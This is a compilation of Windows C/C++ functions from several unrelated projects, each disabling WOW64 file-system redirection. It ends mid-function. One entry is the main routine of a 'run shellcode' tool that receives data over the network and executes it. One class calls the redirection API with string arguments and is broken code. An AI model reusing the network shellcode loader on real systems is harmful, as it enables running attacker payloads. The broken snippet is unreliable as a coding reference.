static BOOL start_rpcss(void) { PROCESS_INFORMATION pi; STARTUPINFOW si; WCHAR cmd[MAX_PATH]; static const WCHAR rpcss[] = {'\\','r','p','c','s','s','.','e','x','e',0}; BOOL rslt; void *redir; TRACE("\n"); ZeroMemory(&si, sizeof(STARTUPINFOA)); si.cb = sizeof(STARTUPINFOA); GetSystemDirectoryW( cmd, MAX_PATH - sizeof(rpcss)/sizeof(WCHAR) ); lstrcatW( cmd, rpcss ); Wow64DisableWow64FsRedirection( &redir ); rslt = CreateProcessW( cmd, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi ); Wow64RevertWow64FsRedirection( redir ); if (rslt) { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); Sleep(100); } return rslt; }
static gpointer count_thread_fun(gpointer data) { struct a6o_on_demand *on_demand = (struct a6o_on_demand *)data; int recurse = on_demand->flags & ARMADITO_SCAN_RECURSE; int count = 0; #ifdef WIN32 void * OldValue = NULL; if (Wow64DisableWow64FsRedirection(&OldValue) == FALSE) { return NULL; } #endif os_dir_map(on_demand->root_path, recurse, count_entry, &count); /* set the counter inside the a6o_scan struct only at the end, so */ /* that the scan function does not see the intermediate values, only the last one */ on_demand->scan->to_scan_count = count; #ifdef WIN32 if (Wow64RevertWow64FsRedirection(OldValue) == FALSE ) { return NULL; } #endif return NULL; }
DisableWow64FileSystemRedirection::DisableWow64FileSystemRedirection(void) : m_OldValue(NULL) { m_hModule = ::LoadLibraryEx(L"Kernel32.dll", NULL, LOAD_WITH_ALTERED_SEARCH_PATH); if (m_hModule) Wow64DisableWow64FsRedirection("Wow64DisableWow64FsRedirection"); }
DisableWow64FileSystemRedirection::~DisableWow64FileSystemRedirection(void) { if (m_hModule) { Wow64DisableWow64FsRedirection("Wow64RevertWow64FsRedirection"); ::FreeLibrary(m_hModule); } }
void CSystem::ForbidRedir() { if (ifRedirFrobid == false && GetSystemBits() == 64) { Wow64DisableWow64FsRedirection(&oldValue); ifRedirFrobid = true; } }
//----------------------------------------------- void SJ_Menu_Begin( char lastState ) { g_timeToNextKey = 0.5f;//s_keyTime*0.5f; ZeroMemory( s_availSkins, sizeof(s_availSkins) ); s_curSkin = 0; // -- Retrieve all available skins wchar_t path[MAX_PATH]; GetCurrentDirectory(MAX_PATH-1, path); _swprintf( g_txt, L"%s\\*", path ); #ifdef _WIN64 PVOID OldValue = NULL; Wow64DisableWow64FsRedirection( &OldValue ); #endif WIN32_FIND_DATA ffdata; HANDLE hFind = FindFirstFile( g_txt, &ffdata ); if ( hFind != INVALID_HANDLE_VALUE ) { do { if ( ffdata.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY ) { static const wchar_t* keypaths[] = { L"config.txt", L"levels", L"levels\\easy", L"levels\\medium", L"levels\\hard", L"levels\\extreme", L"sprites" }; bool validSkin = true; for ( int i = 0; i < 7 && validSkin; ++i ) { _swprintf( g_txt, L"%s\\%s\\%s", path, ffdata.cFileName, keypaths[i] ); validSkin = validSkin && _waccess_s( g_txt, 0 ) == 0; } if ( validSkin && s_curSkin < MAX_AVAILSKINS ) { wcscpy_s( s_availSkins[s_curSkin], ffdata.cFileName ); if ( _wcsicmp( ffdata.cFileName, DEFAULT_SKIN ) == 0 ) s_skinValue = s_curSkin; ++s_curSkin; } }else { } }while ( FindNextFile(hFind,&ffdata)!=0 ); FindClose(hFind); } #ifdef _WIN64 if ( OldValue ) Wow64RevertWow64FsRedirection( OldValue ); #endif Menu_UpdateLabels(); }
QString FindModuleFile(QWidget* pParent, const QString& originalPath) { QString tryFile = originalPath; QFileInfo fileInfo(originalPath); #if AMDT_BUILD_TARGET == AMDT_WINDOWS_OS PVOID oldValue = nullptr; BOOL doRedirect = false; IsWow64Process(GetCurrentProcess(), &doRedirect); if (doRedirect) { doRedirect = (BOOL) Wow64DisableWow64FsRedirection(&oldValue); } #endif while (!QFile::exists(tryFile)) { // We did not find the file, ask user where it is. // Save the path of the user selected and use it next time. tryFile = QFileDialog::getOpenFileName(pParent, "Locate module file " + fileInfo.fileName(), originalPath, "Module File (*.*)"); if (tryFile.isEmpty()) { #if AMDT_BUILD_TARGET == AMDT_WINDOWS_OS if (doRedirect) { Wow64RevertWow64FsRedirection(oldValue); } #endif return QString::null; } } #if AMDT_BUILD_TARGET == AMDT_WINDOWS_OS if (doRedirect) { Wow64RevertWow64FsRedirection(oldValue); } #endif return tryFile; }
void LoadDrivers() { if (!gCAProfAPISharedMapFile) { InitializeProfAPISharedObj(); } if (!gPwrProfSharedMapFile) { InitializePwrProfSharedObj(); } if (!gDriverHandlePcore) { wchar_t drivername[nBufferSize + 1]; wchar_t systemDir[MAX_PATH]; systemDir[0] = '\0'; GetSystemDirectory(systemDir, MAX_PATH); PVOID oldValue = nullptr; BOOL isSys64; IsWow64Process(GetCurrentProcess(), &isSys64); if (isSys64) { isSys64 = Wow64DisableWow64FsRedirection(&oldValue); } swprintf(drivername, nBufferSize, L"%s%s", systemDir, L"\\drivers\\PCORE"); OpenAmdDriver((LPCTSTR)drivername, &gDriverHandlePcore); swprintf(drivername, nBufferSize, L"%s%s", systemDir, L"\\drivers\\CpuProf"); OpenAmdDriver((LPCTSTR)drivername, &gDriverHandleCAProf); // Install the Power Profiler driver only on AMD supported platforms swprintf(drivername, nBufferSize, L"%s%s", systemDir, L"\\drivers\\AMDTPwrProf"); OpenAmdDriver((LPCTSTR)drivername, &gDriverHandlePwrProf); if (isSys64) { Wow64RevertWow64FsRedirection(oldValue); } } }
static BOOL run_winemenubuilder( const WCHAR *args ) { static const WCHAR menubuilder[] = {'\\','w','i','n','e','m','e','n','u','b','u','i','l','d','e','r','.','e','x','e',0}; LONG len; LPWSTR buffer; STARTUPINFOW si; PROCESS_INFORMATION pi; BOOL ret; WCHAR app[MAX_PATH]; void *redir; GetSystemDirectoryW( app, MAX_PATH - sizeof(menubuilder)/sizeof(WCHAR) ); strcatW( app, menubuilder ); len = (strlenW( app ) + strlenW( args ) + 1) * sizeof(WCHAR); buffer = heap_alloc( len ); if( !buffer ) return FALSE; strcpyW( buffer, app ); strcatW( buffer, args ); TRACE("starting %s\n",debugstr_w(buffer)); memset(&si, 0, sizeof(si)); si.cb = sizeof(si); Wow64DisableWow64FsRedirection( &redir ); ret = CreateProcessW( app, buffer, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi ); Wow64RevertWow64FsRedirection( redir ); heap_free( buffer ); if (ret) { CloseHandle( pi.hProcess ); CloseHandle( pi.hThread ); } return ret; }
/*********************************************************************** * ExitWindowsEx (USER32.@) */ BOOL WINAPI ExitWindowsEx( UINT flags, DWORD reason ) { static const WCHAR winebootW[] = { '\\','w','i','n','e','b','o','o','t','.','e','x','e',0 }; static const WCHAR killW[] = { ' ','-','-','k','i','l','l',0 }; static const WCHAR end_sessionW[] = { ' ','-','-','e','n','d','-','s','e','s','s','i','o','n',0 }; static const WCHAR forceW[] = { ' ','-','-','f','o','r','c','e',0 }; static const WCHAR shutdownW[] = { ' ','-','-','s','h','u','t','d','o','w','n',0 }; WCHAR app[MAX_PATH]; WCHAR cmdline[MAX_PATH + 64]; PROCESS_INFORMATION pi; STARTUPINFOW si; void *redir; GetSystemDirectoryW( app, MAX_PATH - sizeof(winebootW)/sizeof(WCHAR) ); strcatW( app, winebootW ); strcpyW( cmdline, app ); if (flags & EWX_FORCE) lstrcatW( cmdline, killW ); else { lstrcatW( cmdline, end_sessionW ); if (flags & EWX_FORCEIFHUNG) lstrcatW( cmdline, forceW ); } if (!(flags & EWX_REBOOT)) lstrcatW( cmdline, shutdownW ); memset( &si, 0, sizeof si ); si.cb = sizeof si; Wow64DisableWow64FsRedirection( &redir ); if (!CreateProcessW( app, cmdline, NULL, NULL, FALSE, DETACHED_PROCESS, NULL, NULL, &si, &pi )) { Wow64RevertWow64FsRedirection( redir ); ERR( "Failed to run %s\n", debugstr_w(cmdline) ); return FALSE; } Wow64RevertWow64FsRedirection( redir ); CloseHandle( pi.hProcess ); CloseHandle( pi.hThread ); return TRUE; }
/* the thread function called by the thread pool, in case of threaded scan */ static void scan_entry_thread_fun(gpointer data, gpointer user_data) { struct a6o_on_demand *on_demand = (struct a6o_on_demand *)user_data; char *path = (char *)data; #ifdef _WIN32 void * OldValue = NULL; if (Wow64DisableWow64FsRedirection(&OldValue) == FALSE) { return; } #endif if(!cancel) scan_file(on_demand, path); /* path was strdup'ed, so free it */ free(path); #ifdef _WIN32 if (Wow64RevertWow64FsRedirection(OldValue) == FALSE ){ return; } #endif }
int main( int argc, char *argv[] ) { extern HANDLE CDECL __wine_make_process_system(void); static const WCHAR RunW[] = {'R','u','n',0}; static const WCHAR RunOnceW[] = {'R','u','n','O','n','c','e',0}; static const WCHAR RunServicesW[] = {'R','u','n','S','e','r','v','i','c','e','s',0}; static const WCHAR RunServicesOnceW[] = {'R','u','n','S','e','r','v','i','c','e','s','O','n','c','e',0}; static const WCHAR wineboot_eventW[] = {'_','_','w','i','n','e','b','o','o','t','_','e','v','e','n','t',0}; /* First, set the current directory to SystemRoot */ int optc; int end_session = 0, force = 0, init = 0, kill = 0, restart = 0, shutdown = 0, update = 0; HANDLE event; SECURITY_ATTRIBUTES sa; BOOL is_wow64; GetWindowsDirectoryW( windowsdir, MAX_PATH ); if( !SetCurrentDirectoryW( windowsdir ) ) WINE_ERR("Cannot set the dir to %s (%d)\n", wine_dbgstr_w(windowsdir), GetLastError() ); if (IsWow64Process( GetCurrentProcess(), &is_wow64 ) && is_wow64) { STARTUPINFOW si; PROCESS_INFORMATION pi; WCHAR filename[MAX_PATH]; void *redir; DWORD exit_code; memset( &si, 0, sizeof(si) ); si.cb = sizeof(si); GetModuleFileNameW( 0, filename, MAX_PATH ); Wow64DisableWow64FsRedirection( &redir ); if (CreateProcessW( filename, GetCommandLineW(), NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi )) { WINE_TRACE( "restarting %s\n", wine_dbgstr_w(filename) ); WaitForSingleObject( pi.hProcess, INFINITE ); GetExitCodeProcess( pi.hProcess, &exit_code ); ExitProcess( exit_code ); } else WINE_ERR( "failed to restart 64-bit %s, err %d\n", wine_dbgstr_w(filename), GetLastError() ); Wow64RevertWow64FsRedirection( redir ); } while ((optc = getopt_long(argc, argv, short_options, long_options, NULL )) != -1) { switch(optc) { case 'e': end_session = 1; break; case 'f': force = 1; break; case 'i': init = 1; break; case 'k': kill = 1; break; case 'r': restart = 1; break; case 's': shutdown = 1; break; case 'u': update = 1; break; case 'h': usage(); return 0; case '?': usage(); return 1; } } if (end_session) { if (kill) { if (!shutdown_all_desktops( force )) return 1; } else if (!shutdown_close_windows( force )) return 1; } if (kill) kill_processes( shutdown ); if (shutdown) return 0; sa.nLength = sizeof(sa); sa.lpSecurityDescriptor = NULL; sa.bInheritHandle = TRUE; /* so that services.exe inherits it */ event = CreateEventW( &sa, TRUE, FALSE, wineboot_eventW ); ResetEvent( event ); /* in case this is a restart */ create_hardware_registry_keys(); create_dynamic_registry_keys(); create_environment_registry_keys(); wininit(); pendingRename(); ProcessWindowsFileProtection(); ProcessRunKeys( HKEY_LOCAL_MACHINE, RunServicesOnceW, TRUE, FALSE ); if (init || (kill && !restart)) { ProcessRunKeys( HKEY_LOCAL_MACHINE, RunServicesW, FALSE, FALSE ); start_services_process(); } if (init || update) update_wineprefix( update ); create_volatile_environment_registry_key(); ProcessRunKeys( HKEY_LOCAL_MACHINE, RunOnceW, TRUE, TRUE ); if (!init && !restart) { ProcessRunKeys( HKEY_LOCAL_MACHINE, RunW, FALSE, FALSE ); ProcessRunKeys( HKEY_CURRENT_USER, RunW, FALSE, FALSE ); ProcessStartupItems(); } WINE_TRACE("Operation done\n"); SetEvent( event ); return 0; }
DWORD RunProcess( __in WORD wExecMode, __in WORD wExecStyle, __in const wchar_t * pwszArg0, __in const wchar_t * pwszParameter, __in const wchar_t * pwszWorkingDirectory, __out volatile DWORD & dwPID, __in DWORD dwWait, LPDWORD lpdwExitCode, BOOL * bIsExist) { DWORD ret = ERROR_SUCCESS; STARTUPINFO si; PROCESS_INFORMATION pi; wchar_t wszCmd[MAX_PATH] = { 0, }; wchar_t wszCommandLine[MAX_PATH] = { 0, }; wchar_t *pwszAppName; wchar_t tmp[TMPBUF]; PVOID oldValue; Wow64DisableWow64FsRedirection(&oldValue); ZeroMemory(&si, sizeof(si)); ZeroMemory(&pi, sizeof(pi)); si.cb = sizeof(si); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = wExecStyle; if (wExecMode == EXEC_MODE_CMD) { TCHAR systemDirPath[MAX_PATH] = _T(""); GetSystemDirectory(systemDirPath, sizeof(systemDirPath) / sizeof(_TCHAR)); swprintf_s(wszCmd, MAX_PATH, L"%s", systemDirPath); wcscat_s(wszCmd, MAX_PATH, L"\\cmd.exe"); pwszAppName = wszCmd; } else { pwszAppName = NULL; } if (pwszArg0) { swprintf_s(wszCommandLine, MAX_PATH, L"%s", pwszArg0); } if (pwszParameter) { if (wcslen(pwszParameter) > 0) { if (wcslen(wszCommandLine) > 0) { wcscat_s(wszCommandLine, MAX_PATH, L" "); } if (wExecMode == EXEC_MODE_CMD) { wcscat_s(wszCommandLine, MAX_PATH, L"/C "); } wcscat_s(wszCommandLine, MAX_PATH, pwszParameter); } } if (!CreateProcess(pwszAppName, wszCommandLine, // Command line NULL, // Process handle not inheritable. NULL, // Thread handle not inheritable. FALSE, // Set handle inheritance to FALSE. 0, // No creation flags. NULL, // Use parent's environment block. pwszWorkingDirectory, // Use parent's starting directory. &si, // Pointer to STARTUPINFO structure. &pi) // Pointer to PROCESS_INFORMATION structure. ) { ret = GetLastError(); dwPID = 0; wsprintf(tmp, L"CreateProcess faild: GetLastError %d\n", ret); WriteLog(tmp); Wow64RevertWow64FsRedirection(oldValue); return ret; } dwPID = pi.dwProcessId; if (dwWait > 0) { ret = WaitForSingleObject(pi.hProcess, dwWait); if (ret != WAIT_OBJECT_0) { if (ret == WAIT_FAILED) { ret = GetLastError(); } CloseHandle(pi.hProcess); CloseHandle(pi.hThread); wsprintf(tmp, L"CreateProcess WaitForSingleObject faild: Error %d\n", ret); WriteLog(tmp); Wow64RevertWow64FsRedirection(oldValue); return ret; } } if (lpdwExitCode) { if (!GetExitCodeProcess(pi.hProcess, lpdwExitCode)) { ret = GetLastError(); wsprintf(tmp, L"CreateProcess GetExitCodeProcess faild: GetLastError %d\n", ret); WriteLog(tmp); } } CloseHandle(pi.hProcess); CloseHandle(pi.hThread); Wow64RevertWow64FsRedirection(oldValue); return ERROR_SUCCESS; }
int __cdecl wmain(int argc, PWCHAR argv[]) { size_t i; WCHAR fileName[MAX_PATH]; WCHAR driverFullPath[MAX_PATH] = {0}; PVOID wow64OldValue; BOOL isAdmin; isAdmin = IsUserAnAdmin(); DokanUseStdErr(TRUE); // Set dokan library debug output Wow64DisableWow64FsRedirection(&wow64OldValue); // Disable system32 direct // setlocale(LC_ALL, ""); GetModuleFileName(NULL, fileName, MAX_PATH); // search the last "\" for (i = wcslen(fileName) - 1; i > 0 && fileName[i] != L'\\'; --i) { ; } fileName[i] = L'\0'; ExpandEnvironmentStringsW(DOKAN_DRIVER_FULL_PATH, driverFullPath, MAX_PATH); fwprintf(stdout, L"Driver path: '%s'\n", driverFullPath); WCHAR option = GetOption(argc, argv, 1); if (option == L'\0' || option == L'?') { return ShowUsage(); } if (!isAdmin && (option == L'i' || option == L'r' || option == L'd' || option == L'u')) { fprintf(stderr, "Admin rights required to process this operation\n"); return EXIT_FAILURE; } switch (option) { // Admin rights required case L'i': { WCHAR type = towlower(argv[2][0]); if (type == L'd') { return InstallDriver(driverFullPath); } else if (type == L'n') { if (DokanNetworkProviderInstall()) fprintf(stdout, "network provider install ok\n"); else fprintf(stderr, "network provider install failed\n"); } else { goto DEFAULT; } } break; case L'r': { WCHAR type = towlower(argv[2][0]); if (type == L'd') { return DeleteDokanService(DOKAN_DRIVER_SERVICE); } else if (type == L'n') { if (DokanNetworkProviderUninstall()) fprintf(stdout, "network provider remove ok\n"); else fprintf(stderr, "network provider remove failed\n"); } else { goto DEFAULT; } } break; case L'd': { WCHAR type = towlower(argv[2][0]); if (L'0' > type || type > L'9') goto DEFAULT; ULONG mode = type - L'0'; if (DokanSetDebugMode(mode)) { fprintf(stdout, "set debug mode ok\n"); } else { fprintf(stderr, "set debug mode failed\n"); } } break; case L'u': { if (argc < 3) { goto DEFAULT; } return Unmount(argv[2]); } break; // No admin rights required case L'l': { ULONG nbRead = 0; PDOKAN_CONTROL dokanControl = malloc(DOKAN_MAX_INSTANCES * sizeof(*dokanControl)); if (dokanControl == NULL) { fprintf(stderr, "Failed to allocate dokanControl\n"); return EXIT_FAILURE; } ZeroMemory(dokanControl, DOKAN_MAX_INSTANCES * sizeof(*dokanControl)); if (DokanGetMountPointList(dokanControl, DOKAN_MAX_INSTANCES, FALSE, &nbRead)) { fwprintf(stdout, L" Mount points: %d\n", nbRead); for (unsigned int p = 0; p < nbRead; ++p) { fwprintf(stdout, L" %u# MountPoint: %s - UNC: %s - DeviceName: %s\n", p, dokanControl[p].MountPoint, dokanControl[p].UNCName, dokanControl[p].DeviceName); } } else { fwprintf(stderr, L" Cannot retrieve mount point list.\n"); } free(dokanControl); } break; case L'v': { fprintf(stdout, "dokanctl : %s %s\n", __DATE__, __TIME__); fprintf(stdout, "Dokan version : %d\n", DokanVersion()); fprintf(stdout, "Dokan driver version : 0x%lx\n", DokanDriverVersion()); } break; DEFAULT: default: fprintf(stderr, "Unknown option - Use /? to show usage\n"); } return EXIT_SUCCESS; }
int __cdecl wmain(int argc, PWCHAR argv[]) { size_t i; WCHAR fileName[MAX_PATH]; WCHAR driverFullPath[MAX_PATH] = {0}; WCHAR type; PVOID wow64OldValue; DokanUseStdErr(TRUE); // Set dokan library debug output Wow64DisableWow64FsRedirection(&wow64OldValue); // Disable system32 direct // setlocale(LC_ALL, ""); GetModuleFileName(NULL, fileName, MAX_PATH); // search the last "\" for (i = wcslen(fileName) - 1; i > 0 && fileName[i] != L'\\'; --i) { ; } fileName[i] = L'\0'; ExpandEnvironmentStringsW(DOKAN_DRIVER_FULL_PATH, driverFullPath, MAX_PATH); fwprintf(stdout, L"Driver path: '%s'\n", driverFullPath); if (GetOption(argc, argv, 1) == L'v') { fprintf(stdout, "dokanctl : %s %s\n", __DATE__, __TIME__); fprintf(stdout, "Dokan version : %d\n", DokanVersion()); fprintf(stdout, "Dokan driver version : 0x%lx\n", DokanDriverVersion()); return EXIT_SUCCESS; } else if (GetOption(argc, argv, 1) == L'u' && argc == 3) { return Unmount(argv[2], FALSE); } else if (GetOption(argc, argv, 1) == L'u' && GetOption(argc, argv, 3) == L'f' && argc == 4) { return Unmount(argv[2], TRUE); } else if (argc < 3 || wcslen(argv[1]) != 2 || argv[1][0] != L'/') { return ShowUsage(); } type = towlower(argv[2][0]); switch (towlower(argv[1][1])) { case L'i': if (type == L'd') { return InstallDriver(driverFullPath); } else if (type == L'n') { if (DokanNetworkProviderInstall()) fprintf(stdout, "network provider install ok\n"); else fprintf(stderr, "network provider install failed\n"); } break; case L'r': if (type == L'd') { return DeleteDokanService(DOKAN_DRIVER_SERVICE); } else if (type == L'n') { if (DokanNetworkProviderUninstall()) fprintf(stdout, "network provider remove ok\n"); else fprintf(stderr, "network provider remove failed\n"); } break; case L'd': if (L'0' <= type && type <= L'9') { ULONG mode = type - L'0'; if (DokanSetDebugMode(mode)) { fprintf(stdout, "set debug mode ok\n"); } else { fprintf(stderr, "set debug mode failed\n"); } } break; case L'l': { ULONG nbRead = 0; DOKAN_CONTROL dokanControl[DOKAN_MAX_INSTANCES]; if (DokanGetMountPointList(dokanControl, DOKAN_MAX_INSTANCES, FALSE, &nbRead)) { fwprintf(stdout, L" Mount points: %d\n", nbRead); for (unsigned int p = 0; p < nbRead; ++p) { fwprintf(stdout, L" %d# MountPoint: %s - UNC: %s - DeviceName: %s\n", p, dokanControl[p].MountPoint, dokanControl[p].UNCName, dokanControl[p].DeviceName); } } else { fwprintf(stderr, L" Cannot retrieve mount point list.\n"); } } break; default: fprintf(stderr, "unknown option\n"); } return EXIT_SUCCESS; }
//returns true if the caching was successful //filePath is the original path, altSource is the user-specified source for the filePath bool CacheFile(const QString& sessionDir, QString filePath, const QString& altSource, bool symsToo) { CacheFileMap cache; //check for current cache if (!ReadSessionCacheFileMap(sessionDir, cache)) { return false; } #if AMDT_BUILD_TARGET == AMDT_WINDOWS_OS PVOID oldValue = nullptr; BOOL doRedirect = false; IsWow64Process(GetCurrentProcess(), &doRedirect); if (doRedirect) { doRedirect = (BOOL) Wow64DisableWow64FsRedirection(&oldValue); } #endif //if needed, create cache sub-dir QString cachePath = sessionDir + "/cache/"; QDir dir(cachePath); if (!dir.exists()) { dir.mkpath(cachePath); } //determine cache name filePath.remove(QChar('\0')); QFileInfo original(filePath); int additional = 1; QString existTest = cachePath + original.fileName(); while (QFile::exists(existTest)) { existTest = cachePath + original.baseName() + " " + QString::number(additional++) + "." + original.completeSuffix(); } //copy to cache QString base = altSource.isEmpty() ? filePath : altSource; if (!QFile::copy(base, existTest)) { #if AMDT_BUILD_TARGET == AMDT_WINDOWS_OS if (doRedirect) { Wow64RevertWow64FsRedirection(oldValue); } #endif return false; } if (symsToo) { QFileInfo baseInfo(base); QString symBase = baseInfo.absolutePath() + "/" + baseInfo.baseName() + ".pdb"; baseInfo.setFile(existTest); QString symCopy = baseInfo.absolutePath() + "/" + baseInfo.baseName() + ".pdb"; QFile::copy(symBase, symCopy); } #if AMDT_BUILD_TARGET == AMDT_WINDOWS_OS if (doRedirect) { Wow64RevertWow64FsRedirection(oldValue); } #endif //add to cache map cache.insert(filePath, existTest); return WriteSessionCacheFileMap(sessionDir, cache); } //CacheFile
int main (int argc, char *argv[]) { args_t args; struct stat st; #ifdef WIN // PVOID OldValue=NULL; WSADATA wsa; Wow64DisableWow64FsRedirection (&OldValue); WSAStartup(MAKEWORD(2,0), &wsa); #endif setbuf(stdout, NULL); setbuf(stderr, NULL); memset (&args, 0, sizeof(args)); // set default parameters args.address = NULL; args.file = NULL; args.ai_family = AF_INET; args.port = DEFAULT_PORT; args.port_nbr = atoi(args.port); args.mode = -1; args.tx_mode = -1; args.sim = 0; args.dbg = 0; printf ("\n[ run shellcode v0.1\n"); parse_args(&args, argc, argv); // check if we have file parameter and it accessible if (args.file!=NULL) { if (stat (args.file, &st)) { printf ("[ unable to access %s\n", args.file); return 0; } else { if (st.st_size > MAX_BUFSIZ) { printf ("[ %s exceeds MAX_BUFSIZ of %i bytes\n", args.file, MAX_BUFSIZ); return 0; } } } // if mode is executing if (args.mode==RSC_EXEC) { if (args.file!=NULL) { xfile(&args); return 0; } else { printf ("\n[ you've used -x without supplying file with -f"); return 0; } } if (init_network(&args)) { // if no file specified, we receive and execute data args.tx_mode = (args.file==NULL) ? RSC_RECV : RSC_SEND; // if mode is -1, we listen for incoming connections if (args.mode == -1) { args.mode=RSC_SERVER; } // if no file specified, set to receive one if (args.tx_mode == -1) { args.tx_mode=RSC_RECV; } if (args.mode==RSC_SERVER) { ssr (&args); } else { csr (&args); } } return 0; }
int wmain( int argc, LPTSTR argv[] ) { // Vars declarations int targetDirInd = 0; BOOL flags[ MAX_OPTIONS ] = { 0 }; TCHAR workDir[ MAX_PATH ] = { 0 }; TCHAR targetDir[ MAX_PATH ] = { 0 }; DWORD workLength = 0; List resultsList = { 0 }; Item resultsItem = { 0 }; PVOID oldValueWow64 = NULL; BOOL wow64Disabled = FALSE; TCHAR* ptTchar = NULL; // Get index of first argument after options // Also determine which options are active targetDirInd = Options( argc, argv, TEXT( "h" ), &flags[ FL_HELP ], NULL ); // Get current working dir workLength = GetCurrentDirectory( _countof( workDir ), workDir ); // Validate target dir if ( ( argc > targetDirInd + 1 ) || flags[ FL_HELP ] ) { // More than one target or // target with gaps (no quotes) specified or // asked for help // Print usage wprintf_s( TEXT( "\n Usage: jdots [options] [target dir]\n\n" ) ); wprintf_s( TEXT( " Options:\n\n" ) ); wprintf_s( TEXT( " -h : Print usage\n\n" ) ); wprintf_s( TEXT( " If no target dir is specified, then the current working dir will be used\n" ) ); return 1; } else if ( ( argc < targetDirInd + 1 ) && ( workLength <= MAX_PATH - 3 ) ) { // No target specified --> assume current dir wcscpy_s( targetDir, MAX_PATH, workDir ); } else if ( argc == targetDirInd + 1 ) { // One target specified // Validate target dir starting with '\' if ( argv[ targetDirInd ][ 0 ] == '\\' ) { // Fetch drive letter from working dir wcsncpy_s( targetDir, MAX_PATH, workDir, 2 ); } // Append passed dir to target dir wcscat_s( targetDir, MAX_PATH, argv[ targetDirInd ] ); } // Set up absolute target dir --> resolve '.' and '..' in target dir if ( !SetCurrentDirectory( targetDir ) ) { ReportError( TEXT( "\nTarget directory not found.\n" ), 0, TRUE ); return 1; } // Display absolute target dir GetCurrentDirectory( _countof( targetDir ), targetDir ); wprintf_s( TEXT( "\n Target dir: \"%s\"\n\n" ), targetDir ); // Initialize results list InitializeList( &resultsList ); // Initialize list's name (measurement name) ptTchar = wcsrchr( targetDir, L'\\' ); if ( ptTchar != NULL ) IniListName( &resultsList, ptTchar + 1 ); else IniListName( &resultsList, TEXT( "" ) ); // Check mem availability if ( ListIsFull( &resultsList ) ) { wprintf_s( TEXT( "\nNo memory available!\n" ) ); return 1; } // Disable file system redirection wow64Disabled = Wow64DisableWow64FsRedirection( &oldValueWow64 ); // Scan target dir scanDir( targetDir, &resultsList, &resultsItem ); // Re-enable redirection if ( wow64Disabled ) { if ( !( Wow64RevertWow64FsRedirection( oldValueWow64 ) ) ) ReportError( TEXT( "Re-enable redirection failed." ), 1, TRUE ); } // Display results if ( ListIsEmpty( &resultsList ) ) wprintf_s( TEXT( "\nNo data.\n\n" ) ); else { // Sort by name (a to Z) SortList( &resultsList, cmpItemsName ); // Display sorted results showResults( &resultsList, &resultsItem ); // Generate KML file outputKml( &resultsList ); } // Housekeeping EmptyTheList( &resultsList ); return 0; }
int wmain( int argc, LPTSTR argv[] ) { // Declare vars TCHAR targetDir[ MAX_PATH ] = { 0 }; TCHAR workDir[ MAX_PATH ] = { 0 }; DWORD targetLength = 0; DWORD workLength = 0; Item resultsItem = { 0 }; List resultsList = { 0 }; LARGE_INTEGER freq; LARGE_INTEGER startingT, endingT, elapsedTicks; BOOL flags[ MAX_OPTIONS ] = { 0 }; int targetDirInd = 0; PVOID oldValueWow64 = NULL; BOOL wow64Disabled = FALSE; // Fetch frec & initial ticks count QueryPerformanceFrequency( &freq ); QueryPerformanceCounter( &startingT ); // Get index of first argument after options // Also determine which options are active targetDirInd = Options( argc, argv, TEXT( "sfdmnthb" ), &flags[ FL_SIZE ], &flags[ FL_FILES ], &flags[ FL_DIRS ], &flags[ FL_MODIF ], &flags[ FL_NAME ], &flags[ FL_TYPE ], &flags[ FL_HELP ], &flags[ FL_DBG ], NULL ); // Get current working dir workLength = GetCurrentDirectory( _countof( workDir ), workDir ); // Validate target dir if ( ( argc > targetDirInd + 1 ) || flags[ FL_HELP ] ) { // More than one target or // target with gaps (no quotes) specified or // asked for help // Print usage wprintf_s( TEXT( "\n Usage: dgl [options] [target dir]\n\n" ) ); wprintf_s( TEXT( " Options:\n\n" ) ); wprintf_s( TEXT( " -s : Sort by size [bytes] (default)\n" ) ); wprintf_s( TEXT( " -f : Sort by files count (descending)\n" ) ); wprintf_s( TEXT( " -d : Sort by dirs count (descending)\n" ) ); wprintf_s( TEXT( " -m : Sort by date modified (latest to earliest)\n" ) ); wprintf_s( TEXT( " -n : Soft by name (a to Z)\n" ) ); wprintf_s( TEXT( " -t : Sort by type (<DIR>, <LIN>, file)\n" ) ); wprintf_s( TEXT( " -h : Print usage\n" ) ); wprintf_s( TEXT( " -b : Extended output (debug purposes)\n\n" ) ); wprintf_s( TEXT( " If no option is specidied, then '-s' will be used\n" ) ); wprintf_s( TEXT( " If no target dir is specified, then the current working dir will be used\n" ) ); return 1; } else if ( ( argc < targetDirInd + 1 ) && ( workLength <= MAX_PATH - 3 ) ) { // No target specified --> assume current dir wcscpy_s( targetDir, MAX_PATH, workDir ); } else if ( argc == targetDirInd + 1 ) { // One target specified // Validate target dir starting with '\' if ( argv[ targetDirInd ][ 0 ] == '\\' ) { // Fetch drive letter from working dir wcsncpy_s( targetDir, MAX_PATH, workDir, 2 ); } // Append passed dir to target dir wcscat_s( targetDir, MAX_PATH, argv[ targetDirInd ] ); } // Set up absolute target dir --> resolve '.' and '..' in target dir if ( !SetCurrentDirectory( targetDir ) ) { ReportError( TEXT( "\nTarget directory not found.\n" ), 0, TRUE ); return 1; } // Display absolute target dir GetCurrentDirectory( _countof( targetDir ), targetDir ); wprintf_s( TEXT( "\n Target dir: \"%s\"\n\n" ), targetDir ); // Initialize results list InitializeList( &resultsList ); if ( ListIsFull( &resultsList ) ) { wprintf_s( TEXT( "\nNo memory available!\n" ) ); return 1; } // Debug output if ( flags[ FL_DBG ] ) wprintf_s( TEXT( " %s\n" ), targetDir ); // Disable file system redirection wow64Disabled = Wow64DisableWow64FsRedirection( &oldValueWow64 ); // Scan target dir scanDir( targetDir, &resultsList, &resultsItem, TRUE, flags[ FL_DBG ] ); // Re-enable redirection if ( wow64Disabled ) { if ( !( Wow64RevertWow64FsRedirection( oldValueWow64 ) ) ) ReportError( TEXT( "Re-enable redirection failed." ), 1, TRUE ); } // Display results if ( ListIsEmpty( &resultsList ) ) wprintf_s( TEXT( "\nNo data.\n\n" ) ); else { // Sort results // if-else chain determines sorting priority // one sorting type high prio excludes low prio types if ( flags[ FL_SIZE ] ) // Sort by size (descending) SortList( &resultsList, cmpItemsSizeCount ); else if ( flags[ FL_FILES ] ) // Sort by files count (descending) SortList( &resultsList, cmpItemsFilesCount ); else if ( flags[ FL_DIRS ] ) // 